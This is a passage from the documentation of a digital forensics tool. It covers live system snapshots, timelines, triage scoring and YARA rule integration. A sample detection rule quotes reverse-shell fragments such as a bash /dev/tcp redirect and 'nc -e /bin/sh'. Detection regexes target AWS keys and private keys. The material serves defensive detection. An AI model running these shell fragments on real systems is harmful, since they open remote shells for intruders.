      "ppid": 1,
      "name": "nginx",
      "cmdline": "nginx: master process /usr/sbin/nginx -g daemon on;",
      "exe_path": "/usr/sbin/nginx",
      "user": "www-data",
      "cpu_percent": 0.5,
      "memory_kb": 12345,
      "start_time": "2024-01-15T08:00:00Z"
    }
  ],
  "network_connections": [
    {
      "protocol": "tcp",
      "local_address": "0.0.0.0",
      "local_port": 80,
      "remote_address": "192.168.1.100",
      "remote_port": 54321,
      "state": "ESTABLISHED",
      "pid": 1234,
      "process_name": "nginx"
    }
  ],
  "loaded_modules": [
    {
      "name": "e1000e",
      "size": 286720,
      "used_by": [],
      "path": "/lib/modules/5.15.0-91-generic/kernel/drivers/net/ethernet/intel/e1000e/e1000e.ko"
    }
  ],
  "open_files": [
    {
      "pid": 1234,
      "process_name": "nginx",
      "fd": 5,
      "file_type": "file",
      "path": "/var/log/nginx/access.log"
    }
  ],
  "environment_variables": {
    "PATH": "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
    "HOME": "/root",
    "SHELL": "/bin/bash"
  }
}

Platform Support

Linux

✅ Full support
System info from /proc and uname
Process list from ps
Network connections from netstat
Kernel modules from /proc/modules
Open files from lsof

macOS

✅ Full support
System info from sw_vers, sysctl, uname
Process list from ps
Network connections from netstat
Kernel extensions from kextstat
Open files from lsof

Windows

⚠️ Partial support
System info from systeminfo
Process list from wmic
Network connections from netstat
Loaded drivers from driverquery
Open files: Not supported (requires admin privileges and third-party tools)

Use Cases

1. Incident Response Triage

Quickly capture system state during an active incident:

sus / \
  --system-snapshot \
  --target Quick_Triage \
  --collect \
  --output-dir /cases/incident_$(date +%Y%m%d_%H%M%S)

2. Malware Investigation

Identify suspicious processes and connections:

sus /suspicious \
  --system-snapshot \
  --profile profiles/base/malware.toml \
  --collect

Then analyze system_snapshot.json for:

Processes with unusual command lines
Unexpected network connections
Suspicious loaded modules
Hidden or masquerading processes

3. Baseline Creation

Create system baseline for comparison:

# Create baseline
sus / --system-snapshot --system-snapshot-output /baselines/system_baseline.json

# Later, compare current state
sus / --system-snapshot --system-snapshot-output /investigation/current_state.json

# Use external tools to diff the JSON files

4. Multi-System Investigation

Collect state from multiple systems:

#!/bin/bash
for host in web01 web02 db01 cache01; do
  ssh $host "sus / --system-snapshot --system-snapshot-output /tmp/live_${host}.json"
  scp $host:/tmp/live_${host}.json /investigation/
done

5. Container/VM Forensics

Collect from running containers or VMs:

# Docker container
docker exec -it container_name sus / --system-snapshot

# Kubernetes pod
kubectl exec -it pod-name -- sus / --system-snapshot

Analysis Techniques

Process Analysis

Look for:

Processes with suspicious names (typosquatting)
Unusual command line arguments
Processes running from temp directories
Processes with unusual parent-child relationships
High CPU/memory usage

Network Analysis

Identify:

Unexpected listening services
Connections to suspicious IPs
Connections on non-standard ports
Processes with many connections

Module Analysis

Check for:

Unknown or unsigned modules
Modules loaded from unusual locations
Recently loaded modules
Modules with no dependencies (potentially rootkits)

File Handle Analysis

Examine:

Deleted but still open files (Unix)
Processes accessing sensitive data
Temporary file usage
Log file access patterns

Integration with Other Features

With Artifact Collection

Combine live response with file collection:

sus /system \
  --system-snapshot \
  --collect \
  --target forensic-investigation

Creates complete evidence package with both volatile and non-volatile data.

With Timeline Generation

Correlate system state with file access times:

sus /evidence \
  --system-snapshot \
  --generate-timeline json \
  --collect

Allows temporal analysis of file modifications vs. process activity.

With Module/Target System

Use forensic targets with live response:

# KAPE-style triage with live response
sus / --target KAPE_Triage --system-snapshot --collect

# Browser artifacts with live response (see running browsers)
sus / --target KAPE_BrowserHistory --system-snapshot

# Windows execution evidence with live processes
sus / --target KAPE_EvidenceOfExecution --system-snapshot

Best Practices

1. Collect Early

Capture live response at the beginning of investigation before system state changes.

2. Preserve Original

Keep original live response JSON for chain of custody.

3. Document Collection

Database server

sus /mnt/db01
--tag-dir '/mnt/db01:db01'
--system-snapshot
--system-snapshot-output /investigation/db01_live.json


Record when and why live response was collected:

```bash
sus / --system-snapshot --system-snapshot-output \
  /case/evidence/system_snapshot_$(date -Iseconds).json

4. Correlate Data

Cross-reference live response with:

File analysis results
Timeline events
Network logs
System logs

5. Look for Anomalies

Compare against known-good baselines to identify:

New/unknown processes
Unexpected network activity
Recently loaded modules
Unusual file access patterns

Limitations

Windows Open Files

Open file collection not currently supported on Windows due to:

Requires administrative privileges
No built-in equivalent to lsof
Would need third-party tools (e.g., Sysinternals Handle.exe)

Process Details

Some process details may be limited:

CPU/memory metrics not collected on all platforms
Process start times may be approximate
User information may not be available

Performance Impact

System snapshot collection:

May take several seconds on busy systems
lsof can be slow with many open files
Limited to 10,000 open files to prevent huge output

Privilege Requirements

Some data requires elevated privileges:

Full process information (all users)
Some network connection details
System driver information (Windows)

Security Considerations

Sensitive Data

System snapshot may capture:

Command line arguments with passwords
Environment variables with secrets
Network connections to internal systems
Process names revealing infrastructure

Recommendation: Review and redact sensitive information before sharing.

Evidence Integrity

System snapshot data is volatile:

Cannot be independently verified
Changes between collections
No cryptographic integrity by default

Recommendation:

Hash the output file immediately: sha256sum system_snapshot.json
Document collection time and methodology
Collect multiple snapshots if needed

Access Control

Protect live response files:

chmod 600 system_snapshot.json
chown investigator:investigators system_snapshot.json

Troubleshooting

Empty Process List

Check if ps or wmic is available
Verify permissions (may need elevated privileges)
Check system compatibility

No Network Connections

Verify netstat is installed
Some connections may require privileges
Check if connections exist (use native tools to verify)

lsof Not Available

Install lsof: apt-get install lsof or brew install lsof
Open files collection will be skipped if unavailable
Not critical for basic investigation

Permission Denied

Some data requires root/administrator privileges
Run with elevated privileges if needed
Partial data will still be collected

Future Enhancements

Planned features:

Direct sysinfo crate integration (eliminate command dependencies)
Windows open files support via native APIs
Memory dump integration
Active connections packet capture
Real-time monitoring mode
Diff mode to compare snapshots
Export to STIX/CybOX formats
Integration with Plaso/log2timeline

Artifact Collection - File artifact collection
Timeline Generation - Timeline creation
Compound Targets - Module and target system
UAC/KAPE Features - Feature analysis and roadmap

References

UAC (Unix-like Artifacts Collector): https://github.com/tclahr/uac
KAPE (Kroll Artifact Parser and Extractor): https://www.kroll.com/kape
SANS DFIR: https://www.sans.org/digital-forensics-incident-response/
Volatility Framework: https://www.volatilityfoundation.org/

Timeline Generation

Timeline generation extracts and aggregates timestamps from analyzed files and artifacts to create a chronological view of file activity. This is particularly useful for forensic investigations, incident response, and understanding file access patterns across systems.

Overview

The timeline feature:

Extracts timestamps (created, modified, accessed) from all analyzed files
Generates output in multiple formats (CSV, JSON, JSON Lines)
Supports filtering by tags for multi-system analysis
Includes file metadata and pattern match counts
Sorts events chronologically for timeline analysis

Usage

Basic Timeline Generation

Generate a CSV timeline after analysis:

# Analyze files and generate timeline
sus /path/to/analyze --generate-timeline csv

# Output: ./output/timeline.csv

Timeline Formats

Three output formats are supported:

CSV Format (Default)

sus /path --generate-timeline csv --timeline-output investigation/timeline.csv

CSV format is RFC 4180 compliant and can be imported into spreadsheet applications for analysis.

JSON Format

sus /path --generate-timeline json --timeline-output timeline.json

JSON format provides a structured array of timeline events suitable for programmatic processing.

JSON Lines Format

sus /path --generate-timeline jsonl --timeline-output timeline.jsonl

JSON Lines (one event per line) is ideal for streaming processing and log analysis tools.

Filtering Timeline Events

Filter by Tags (Multi-System Analysis)

When analyzing multiple systems with tags, filter timeline to specific systems:

# Analyze multiple servers with tags
sus /evidence --tag-dir '/server1:server1' --tag-dir '/server2:server2' \
    --generate-timeline csv --timeline-filter-tag server1

This generates a timeline containing only events from server1.

Multiple Tags

sus /evidence --generate-timeline csv \
    --timeline-filter-tag webserver \
    --timeline-filter-tag database

Control Timestamp Types

By default, all timestamp types (created, modified, accessed) are included. You can exclude specific types:

# Only modification timestamps (exclude created and accessed)
sus /path --generate-timeline csv \
    --timeline-include-created=false \
    --timeline-include-accessed=false

Timeline Event Fields

Each timeline event contains:

Field	Description
`timestamp`	ISO 8601 timestamp of the event
`timestamp_type`	Type of timestamp (created, modified, accessed, collected)
`file_path`	Full path to the file
`file_name`	File name without directory
`sha256`	SHA256 hash of file content
`mime_type`	MIME type detected from file extension
`tag`	Tag associated with file (for multi-system analysis)
`pattern_match_count`	Number of patterns matched in this file
`is_symbolic_link`	Whether file is a symbolic link
`is_extracted`	Whether file was extracted from an archive
`is_decoded`	Whether file was decoded from an encoding

Forensic Workflows

Incident Response Timeline

Combine artifact collection with timeline generation for complete incident response:

# Collect artifacts and generate timeline
sus /evidence --target KAPE_Triage \
    --collect \
    --generate-timeline csv \
    --timeline-output investigation/incident-timeline.csv

This creates:

output/collected/ - Collected suspicious files
output/collected/manifest.json - Collection manifest
investigation/incident-timeline.csv - Timeline of all file activity

Multi-System Investigation

Analyze multiple systems and generate tagged timeline:

# Collect from multiple servers
sus /mnt/forensics \
    --tag-dir '/mnt/forensics/web01:web01' \
    --tag-dir '/mnt/forensics/db01:db01' \
    --tag-dir '/mnt/forensics/app01:app01' \
    --target KAPE_Triage \
    --collect \
    --generate-timeline csv

# Generate separate timelines per system
sus --server-only --generate-timeline csv --timeline-filter-tag web01 --timeline-output web01-timeline.csv
sus --server-only --generate-timeline csv --timeline-filter-tag db01 --timeline-output db01-timeline.csv

Evidence of Execution Timeline

Focus on program execution artifacts:

sus /windows/system32 \
    --target KAPE_EvidenceOfExecution \
    --generate-timeline json \
    --timeline-output execution-timeline.json

Browser Activity Timeline

Generate timeline of browser usage:

sus /Users \
    --target KAPE_BrowserHistory \
    --generate-timeline csv \
    --timeline-output browser-activity.csv

CSV Timeline Format

Example CSV output:

timestamp,timestamp_type,file_path,file_name,sha256,mime_type,tag,pattern_matches,is_symbolic_link,is_extracted,is_decoded
2024-01-15T10:23:45Z,created,/var/log/auth.log,auth.log,abc123...,text/plain,server1,3,false,false,false
2024-01-15T10:24:12Z,modified,/var/log/auth.log,auth.log,abc123...,text/plain,server1,3,false,false,false
2024-01-15T11:05:33Z,accessed,/etc/passwd,passwd,def456...,text/plain,server1,0,false,false,false

JSON Timeline Format

Example JSON output:

[
  {
    "timestamp": "2024-01-15T10:23:45Z",
    "timestamp_type": "created",
    "file_path": "/var/log/auth.log",
    "file_name": "auth.log",
    "sha256": "abc123...",
    "mime_type": "text/plain",
    "tag": "server1",
    "pattern_match_count": 3,
    "is_symbolic_link": false,
    "is_extracted": false,
    "is_decoded": false,
    "metadata": {}
  }
]

Integration with Analysis Tools

Plaso/log2timeline Integration

While sus doesn't directly output Plaso format, the CSV and JSON formats can be imported into analysis tools:

# Generate JSON Lines for easy parsing
sus /evidence --generate-timeline jsonl --timeline-output events.jsonl

# Process with custom scripts or import into Elastic/Splunk

Timeline Visualization

The CSV format can be imported into:

Excel/LibreOffice - Spreadsheet analysis and visualization
Timeline Explorer - Forensic timeline viewer
Elastic/Kibana - Enterprise SIEM platforms (via JSON/JSONL)
Splunk - Security monitoring (via JSON/JSONL)
Custom Python scripts - Using pandas for analysis

Best Practices

Performance Considerations

Large Datasets: For very large datasets (millions of files), JSON Lines format is more efficient for streaming processing
Filtering: Use tag filtering to reduce timeline size when analyzing multiple systems
Timestamp Selection: Exclude unnecessary timestamp types to reduce timeline size:

# Only modification times (smallest timeline)
sus /path --generate-timeline csv \
    --timeline-include-created=false \
    --timeline-include-accessed=false

Forensic Integrity

Timeline Generation: Generate timeline immediately after analysis to preserve timestamp context
Documentation: Include timeline metadata in investigation notes:
- Analysis start/end time
- Profile used
- Systems analyzed
- Timeline filters applied
Chain of Custody: Timeline files should be treated as evidence artifacts

Advanced Examples

Complete Forensic Collection with Timeline

# Full forensic triage with collection and timeline
sus /mnt/evidence \
    --profile profiles/composite/forensic-investigation.toml \
    --collect \
    --generate-timeline csv \
    --output-dir /cases/case-001/analysis

Output structure:

/cases/case-001/analysis/
├── analysis.db                    # Analysis database
├── collected/                     # Collected artifacts
│   ├── default/                   # Artifacts by tag
│   └── manifest.json             # Collection manifest
├── timeline.csv                   # Timeline of all activity
└── files/                         # File metadata

Timeline-Only Generation from Existing Analysis

If you've already performed analysis and want to generate a timeline later:

# Re-run with --server-only and --generate-timeline
sus --server-only \
    --output-dir ./existing-output \
    --generate-timeline json \
    --timeline-output new-timeline.json

Custom Timeline Processing

Process JSON Lines timeline with jq:

# Extract only files with pattern matches
jq 'select(.pattern_match_count > 0)' timeline.jsonl

# Get timeline for specific file type
jq 'select(.mime_type == "text/x-shellscript")' timeline.jsonl

# Find files modified in specific time range
jq 'select(.timestamp_type == "modified" and .timestamp >= "2024-01-01")' timeline.jsonl

Future Enhancements

Planned features for timeline generation:

Collection Timestamps: Include when artifacts were collected (from manifest)
Plaso Format Export: Direct export to Plaso/log2timeline format
Web UI Timeline Viewer: Interactive timeline visualization in web interface
Timeline Correlation: Automatic correlation of related events
Super Timeline: Merge multiple timeline sources (filesystem, registry, logs)

References

SANS DFIR Timeline Analysis
Plaso/log2timeline - Super timeline tool
KAPE - Forensic artifact collection

Triage Scoring System

Recommendations

Assign risk scores to artifacts based on forensic value
Prioritise high-value artifacts (memory dumps, registry, event logs)
Generate triage reports
Flag "MUST INVESTIGATE" items

2. Pattern Match Count (0-30 points)

Number of suspicious patterns detected in the file:

Match Count	Score	Assessment
0	0	No patterns detected
1-5	5	Minimal suspicious activity
6-10	10	Low suspicious activity
11-20	15	Moderate suspicious activity
21-50	20	High suspicious activity
51-100	25	Very high suspicious activity
100+	30	Critical suspicious activity

3. Pattern Severity (0-20 points)

Weighted by the criticality of matched patterns using logarithmic scaling:

More patterns = higher severity score
Logarithmic function prevents score inflation
Formula: min(ln(pattern_count) * 5, 20)

4. File Characteristics (0-10 points)

Additional scoring factors:

Large files (>1GB): +5 points - May contain extensive evidence
Very large files (>100MB): +3 points - Significant content
Memory-related paths (hiberfil, pagefile): +5 points - System memory artifacts

Risk Level Classification

Scores are categorized into five risk levels:

Score Range	Risk Level	Priority	Icon	Description
90-100	🔴 Critical	Immediate	Red	MUST INVESTIGATE - Highest priority items
70-89	🟠 High	High	Orange	High priority investigation required
50-69	🟡 Medium	Moderate	Yellow	Moderate priority investigation
30-49	🔵 Low	Review	Cyan	Review if time permits
0-29	⚪ Minimal	Optional	Gray	Low forensic value

Must Investigate Flag

Files are flagged as "MUST INVESTIGATE" when:

Score ≥ 90, OR
High-value file type (Memory Dump, Registry Hive, Event Log) AND 20+ pattern matches

These files should be examined first in any investigation.

Usage

Basic Triage Report

# Generate triage report with default settings
sus /evidence --triage-report

# Output:
# - Console report with top 20 files
# - JSON file: output/triage_report.json

Filtering by Score Threshold

# Only show files with score ≥ 70 (High and Critical)
sus /evidence --triage-report --triage-min-score 70

# Only show files with score ≥ 90 (Critical only)
sus /evidence --triage-report --triage-min-score 90

Custom Output Location

# Specify custom output file
sus /evidence --triage-report --triage-output /investigation/triage.json

Include All Scores

# Include all files in report (not just top 100)
sus /evidence --triage-report --triage-include-all

Combined with Other Features

# Complete forensic workflow with triage
sus /evidence \
    --target KAPE_Triage \
    --collect \
    --system-snapshot \
    --parse-registry \
    --parse-evtx \
    --generate-timeline json \
    --triage-report

# Incident response with high-priority filtering
sus /compromised-system \
    --profile profiles/composite/incident-response.toml \
    --collect \
    --triage-report \
    --triage-min-score 70

Output Format

Console Output

================================================================================
🎯 TRIAGE REPORT - Generated at 2024-01-15T10:30:45.123Z
================================================================================

📊 Summary:
  Total Files: 1543
  🔴 Critical: 15 files (score 90-100)
  🟠 High: 87 files (score 70-89)
  🟡 Medium: 234 files (score 50-69)
  🔵 Low: 456 files (score 30-49)
  ⚪ Minimal: 751 files (score 0-29)

  ⚠️  MUST INVESTIGATE: 15 files

🔝 Top Priority Files (Top 20):
--------------------------------------------------------------------------------

1. 🔴 Score: 95 | Critical | Memory Dump
   Path: /evidence/memory.dmp
   Hash: abc123...
   Patterns: 45 matches
   Reasons:
     • High-value artifact type: Memory Dump
     • 45 suspicious patterns detected
     • ⚠️  MUST INVESTIGATE

2. 🔴 Score: 92 | Critical | Registry Hive
   Path: C:\\Windows\\System32\\config\\SYSTEM
   Hash: def456...
   Patterns: 38 matches
   Reasons:
     • High-value artifact type: Registry Hive
     • 38 suspicious patterns detected
     • ⚠️  MUST INVESTIGATE
...

JSON Output (triage_report.json)

{
  "total_files": 1543,
  "critical_count": 15,
  "high_count": 87,
  "medium_count": 234,
  "low_count": 456,
  "minimal_count": 751,
  "must_investigate_count": 15,
  "generated_at": "2024-01-15T10:30:45.123Z",
  "top_scores": [
    {
      "path": "/evidence/memory.dmp",
      "sha256": "abc123...",
      "score": 95,
      "risk_level": "Critical",
      "file_type_score": 40,
      "pattern_count_score": 25,
      "pattern_severity_score": 19,
      "characteristics_score": 11,
      "pattern_matches": 45,
      "file_type": "Memory Dump",
      "reasons": [
        "High-value artifact type: Memory Dump",
        "45 suspicious patterns detected",
        "Large file size",
        "Memory/hibernation file detected",
        "⚠️  MUST INVESTIGATE"
      ],
      "must_investigate": true
    }
  ],
  "all_scores": null
}

Forensic Workflows

1. Incident Response Triage

# Identify critical evidence quickly
sus /compromised-system \
    --target KAPE_Triage \
    --collect \
    --system-snapshot \
    --triage-report \
    --triage-min-score 70 \
    --triage-output ir_triage.json

# Focus on top findings:
# 1. Review MUST INVESTIGATE items first
# 2. Investigate Critical and High priority files
# 3. Collect high-scoring artifacts

Limitations

Current Limitations

Pattern-Based Scoring: Relies on pattern matches, may miss sophisticated attacks
File Type Detection: Based on path and extension, not deep file analysis
Static Scoring: Does not adapt to investigation context
No Machine Learning: Uses rule-based scoring, not ML-based risk assessment

Best Practices

1. Start with Must Investigate Items

Always review files flagged with "MUST INVESTIGATE" first - these represent the highest-priority evidence.

2. Use Score Thresholds Appropriately

Incident Response: Use --triage-min-score 70 to focus on actionable items
Comprehensive Analysis: Use default (0) to see full picture
Quick Triage: Use --triage-min-score 90 for critical items only

3. Combine with Other Features

Triage scoring is most effective when combined with:

Artifact collection (--collect)
Timeline generation (--generate-timeline)
Registry parsing (--parse-registry)
Event log analysis (--parse-evtx)
System snapshot (--system-snapshot)

4. Iterative Analysis

Run initial triage to identify high-priority files
Analyze top-scoring items in detail
Refine profiles based on findings
Re-run triage with updated profiles

Export triage reports to JSON for sharing with team
Include triage scores in investigation documentation
Use scores to justify analysis priorities

Limitations

Current Limitations

Pattern-Based Scoring: Relies on pattern matches, may miss sophisticated attacks
File Type Detection: Based on path and extension, not deep file analysis
Static Scoring: Does not adapt to investigation context
No Machine Learning: Uses rule-based scoring, not ML-based risk assessment

Recommendations

Assign risk scores to artifacts based on forensic value
Prioritise high-value artifacts (memory dumps, registry, event logs)
Generate triage reports
Flag "MUST INVESTIGATE" items

2. Large-Scale Forensic Collection

# Triage thousands of files efficiently
sus /forensic-image \
    --profile profiles/composite/forensic-investigation.toml \
    --triage-report \
    --triage-include-all

# Prioritize analysis:
# 1. Export triage report
# 2. Filter by risk level
# 3. Focus on high-value artifacts

3. Malware Analysis

# Score files for malware indicators
sus /malware-samples \
    --profile profiles/base/malware.toml \
    --triage-report \
    --triage-min-score 50

# Review:
# 1. High-scoring executables
# 2. Suspicious scripts
# 3. Files with multiple pattern matches

4. Data Breach Investigation

# Identify sensitive data exposure
sus /file-server \
    --profile profiles/composite/pci-compliance.toml \
    --triage-report \
    --triage-min-score 60

# Focus on:
# 1. Files with PII patterns
# 2. Configuration files
# 3. Log files with credentials

Interpretation Guidelines

Critical Risk (90-100)

Action Required: Immediate investigation

Typical Files:

Memory dumps with 20+ suspicious patterns
Registry hives with malware indicators
Event logs with security violations
Large files with extensive pattern matches

Investigation Steps:

Prioritize these files first
Perform deep analysis
Correlate with other evidence
Document findings thoroughly

High Risk (70-89)

Action Required: High priority investigation

Typical Files:

Prefetch files with suspicious executions
Browser artifacts with credential patterns
Scripts with obfuscation
Executables with multiple indicators

Investigation Steps:

Review after Critical items
Look for attack patterns
Timeline correlation
Check for persistence mechanisms

Medium Risk (50-69)

Action Required: Moderate priority

Typical Files:

Log files with some suspicious entries
Configuration files with weak settings
Archives containing suspicious files
Documents with embedded content

Investigation Steps:

Review during detailed analysis phase
Look for supporting evidence
Context-based evaluation

Low Risk (30-49) & Minimal (0-29)

Action Required: Review if time permits / Optional

Typical Files:

Standard system files
Benign documents
Empty or minimal content files

Investigation Steps:

Defer until higher priorities complete
May skip in time-constrained investigations
Useful for comprehensive reports

Planned Enhancements

Pattern Severity Weighting: Individual pattern risk scores
ML-Based Scoring: Anomaly detection and behavioral analysis
Investigation Context: Adjust scoring based on investigation type
Historical Baselines: Score deviations from normal patterns
Threat Intel Integration: Incorporate IOC databases

Security Considerations

Triage ≠ Analysis: Scoring supplements investigation, doesn't replace it
False Positives: High scores may occur for benign files with many patterns
False Negatives: Low scores don't guarantee files are safe
Verification Required: Always verify high-scoring findings
Context Matters: Consider organizational environment and threat model

Troubleshooting

No Files Scored

Issue: Triage report shows 0 files

Solutions:

Ensure analysis completed successfully
Check if --triage-min-score is too high
Verify files were analyzed (not skipped)

All Files Have Same Score

Issue: Scores are not differentiating files

Solutions:

Check if patterns are matching effectively
Review profile configuration
Verify file types are being detected

Report Export Fails

Issue: Cannot write triage report to file

Solutions:

Check output directory permissions
Verify disk space availability
Try different output path

Integration with Other Tools

Timeline Tools

Triage scores can be exported and imported into timeline analysis tools:

# Export triage report
sus /evidence --triage-report --triage-output triage.json

# Use with timeline
sus /evidence --generate-timeline csv --triage-report

# High-scoring files appear in timeline with risk indicators

SIEM/SOAR Integration

# Export for SIEM ingestion
sus /evidence --triage-report --triage-output /siem/import/triage.json

# Use JSON output for:
# - Automated alerting on Critical findings
# - Playbook triggering for High-risk items
# - Investigation case enrichment

Forensic Platforms

Triage reports can be imported into forensic platforms (Autopsy, X-Ways, etc.) to prioritize review queues.

References

Version History

v1.0.0 (2024-01-15): Initial triage scoring implementation
- Four-factor scoring model
- Five risk levels
- Must Investigate flagging
- JSON and console output

YARA Rules Integration Guide

This document describes how to integrate YARA rules with sus profiles for enhanced malware detection.

Overview

sus supports YARA-X rules through the yara-x-rules configuration in profiles. YARA rules provide powerful pattern matching capabilities specifically designed for malware detection and classification.

Adding YARA Rules to Profiles

YARA rules can be added to any profile using the yara-x-rules directive:

# In your profile TOML file
yara-x-rules = ["path/to/yara/rules/directory"]

# Can specify multiple directories
yara-x-rules = [
  "yara-rules/malware",
  "yara-rules/exploits",
  "yara-rules/custom"
]

sus will recursively scan the specified directories for files with .yar or .yara extensions and compile them.

Recommended YARA Rule Sources

1. Elastic Endpoint Security YARA Rules

Elastic maintains a comprehensive set of YARA rules for endpoint protection:

Repository: https://github.com/elastic/protections-artifacts

Usage:

# Clone the repository
git clone https://github.com/elastic/protections-artifacts.git yara-rules/elastic

# Add to your profile
yara-x-rules = ["yara-rules/elastic/yara/rules"]

Coverage:

Windows malware and exploits
Linux malware and rootkits
macOS malware
Cross-platform threats
Memory-based detection

2. YARA-Rules Project

Community-maintained collection of YARA rules:

Repository: https://github.com/Yara-Rules/rules

Usage:

git clone https://github.com/Yara-Rules/rules.git yara-rules/community

Coverage:

APT (Advanced Persistent Threat) groups
Malware families
Exploit kits
Packers and obfuscators
Webshells

3. Signature-Base by Florian Roth

High-quality YARA rules by renowned security researcher:

Repository: https://github.com/Neo23x0/signature-base

Usage:

git clone https://github.com/Neo23x0/signature-base.git yara-rules/signature-base

Coverage:

Malware signatures
Exploit signatures
Webshells
Hacktool signatures

4. Awesome YARA

Curated list of YARA rules and resources:

Repository: https://github.com/InQuest/awesome-yara

Provides links to many other YARA rule repositories organized by category.

Example: Enhanced Malware Profile with YARA

Create a malware detection profile that combines pattern matching with YARA rules:

# profiles/base/malware-yara.toml

# Include base malware patterns
includes = ["malware.toml"]

# Add YARA rules from multiple sources
yara-x-rules = [
  "yara-rules/elastic/yara/rules",
  "yara-rules/signature-base/yara",
  "yara-rules/custom"
]

# Additional decode options for obfuscated malware
decode = ["base64", "hex", "unicode-escape-sequences"]

Creating Custom YARA Rules

You can create your own YARA rules and add them to the yara-rules/custom directory:

// yara-rules/custom/custom_backdoor.yara

rule CustomBackdoor {
    meta:
        description = "Detects custom backdoor pattern"
        author = "Security Team"
        date = "2024-01-01"
        
    strings:
        // Specific function name used in custom backdoor
        $connection = "establish_c2_connection_handler" ascii wide
        // Unique encryption routine byte pattern
        $encryption = { 48 89 5C 24 08 48 89 6C 24 10 }
        // Unique marker specific to this backdoor variant
        $marker = "CUSTOM_MARKER_2024_BUILD_4721" ascii
        
    condition:
        // Require at least 2 unique indicators for higher confidence
        2 of them
}

rule SuspiciousNetworkActivity {
    meta:
        description = "Detects suspicious network patterns"
        
    strings:
        $reverse_shell1 = "/bin/bash -i >& /dev/tcp/" ascii
        $reverse_shell2 = "nc -e /bin/sh" ascii
        $beacon = /POST \/[a-f0-9]{32}/ ascii
        
    condition:
        any of them
}

YARA Rule Best Practices

Organization: Organize rules by threat type (malware families, exploits, etc.)
Metadata: Always include descriptive metadata (author, date, description)
Performance: Optimize rules to avoid excessive CPU usage
Testing: Test rules against known samples before deployment
Updates: Regularly update rules from upstream sources
False Positives: Review and tune rules to minimize false positives

YARA Match Output

When YARA rules match, sus stores them in the database's pattern_matches table. Each match includes:

pattern_name: The YARA rule name and namespace (e.g., "elastic:windows:Backdoor:$string1")
match_type: Set to "yara" for YARA matches
match: The matched data (with XOR decoding if applicable)
location: File offset where the match occurred
sha256: Hash of the file containing the match

Query YARA matches:

-- All YARA matches
SELECT * FROM pattern_matches WHERE match_type = 'yara';

-- YARA matches by rule namespace
SELECT * FROM pattern_matches 
WHERE pattern_name LIKE 'elastic:%'
   OR pattern_name LIKE 'windows:%'
   OR pattern_name LIKE 'linux:%';

-- Count matches per rule
SELECT pattern_name, COUNT(*) as match_count 
FROM pattern_matches 
WHERE match_type = 'yara' 
GROUP BY pattern_name 
ORDER BY match_count DESC;

Example Workflow

1. Set Up YARA Rules

mkdir -p yara-rules
cd yara-rules

# Download Elastic rules
git clone https://github.com/elastic/protections-artifacts.git elastic

# Download Signature-Base
git clone https://github.com/Neo23x0/signature-base.git signature-base

# Create custom rules directory
mkdir -p custom

2. Create Enhanced Profile

# profiles/composite/malware-detection-pro.toml

includes = [
  "../base/malware.toml",
  "../base/network.toml"
]

yara-x-rules = [
  "yara-rules/elastic/yara/rules",
  "yara-rules/signature-base/yara"
]

decode = ["base64", "hex", "unicode-escape-sequences"]

[[signatures]]
  name = "YARA Malware Detections"
  query = "SELECT DISTINCT sha256 FROM pattern_matches WHERE match_type = 'yara'"

[[signatures]]
  name = "High Confidence Threats"
  query = "SELECT sha256, COUNT(*) as rule_count FROM pattern_matches WHERE match_type = 'yara' GROUP BY sha256 HAVING rule_count >= 3"

3. Run Analysis

sus /suspicious/files \
  --profile profiles/composite/malware-detection-pro.toml \
  --output-dir ./malware-analysis

4. Review Results

# View YARA matches in web interface
sus --server-only --output-dir ./malware-analysis

# Or query database directly
sqlite3 ./malware-analysis/analysis.db \
  "SELECT pattern_name, COUNT(*) FROM pattern_matches 
   WHERE match_type = 'yara' 
   GROUP BY pattern_name 
   ORDER BY COUNT(*) DESC"

Performance Considerations

Rule Count: Large YARA rulesets can slow down analysis. Start with focused rulesets.
Complex Rules: Rules with many strings or complex conditions take longer to evaluate.
File Size: Large files take longer to scan. Use max-file-size to limit.
Parallelization: sus processes files in parallel to maximize throughput.

Troubleshooting

YARA Compilation Errors

If YARA rules fail to compile:

# Check sus logs for compilation errors during profile loading
sus /path --profile profile.toml 2>&1 | grep -i "error\|yara"

# Note: YARA-X uses different syntax than traditional YARA
# Verify rules are compatible with YARA-X: https://github.com/VirusTotal/yara-x

No Matches Found

If YARA rules aren't matching expected files:

Verify rule syntax with test samples
Check file encoding (try different decode options)
Review rule conditions (some require multiple patterns)
Ensure files are within size limits

Performance Issues

If analysis is too slow:

Reduce number of YARA rules
Profile which rules are slow (using YARA profiling tools)
Decrease max-file-size threshold to skip large files
Use more focused rulesets for specific threat types

Future Enhancements

Planned improvements to YARA integration:

Rule performance profiling
Selective rule loading by category
YARA rule update automation
Custom rule validation
Rule hit statistics and reporting

Additional Resources

License Considerations

When using third-party YARA rules:

Review the license of each rule repository
Ensure compliance with Apache-2.0 if distributing
Attribute rule authors appropriately
Keep upstream repositories updated

Contributing YARA Rules

To contribute YARA rules to the sus project:

Create rules in yara-rules/custom/
Test rules against known samples
Document rule purpose and detection logic
Submit pull request with rule files and documentation
Include test samples (or hashes) for validation

Examples

This folder contains generated example pages. Each page includes the inputs, the TOML profile, and converted report outputs (triage JSON and CSVs).

Available example pages:

Example: aff-forensic

Inputs

examples/inputs/aff-forensic-samples/README.md
examples/inputs/aff-forensic-samples/sample.aff

Profile

# AFF Forensic Image Example Profile
# Demonstrates analysis of AFF (Advanced Forensic Format) forensic disk images

decode = ["base64"]

max-file-size = 104857600  # 100 MiB

tag = "aff-forensic"

# Patterns to match in AFF images and extracted partitions
[[patterns]]
  name = "AFF Signature"
  pattern = "41:46:46"  # "AFF" signature
  type = "bytes"

[[patterns]]
  name = "AFD Signature"
  pattern = "41:46:44"  # "AFD" signature
  type = "bytes"

[[patterns]]
  name = "AWS Access Key"
  pattern = "AKIA[0-9A-Z]{16}"
  type = "regex"

[[patterns]]
  name = "SSH Private Key"
  pattern = "-----BEGIN.*PRIVATE KEY-----"
  type = "regex"

[[patterns]]
  name = "Password in Config"
  pattern = "password\\s*=\\s*['\"]?[^'\"\\s]+"
  type = "regex"

[[patterns]]
  name = "MBR Boot Signature"
  pattern = "55:AA"
  type = "bytes"

[[patterns]]
  name = "GPT Signature"
  pattern = "45:46:49:20:50:41:52:54"  # "EFI PART"
  type = "bytes"

[[patterns]]
  name = "NTFS Signature"
  pattern = "4E:54:46:53"  # "NTFS"
  type = "bytes"

[[patterns]]
  name = "Email Address"
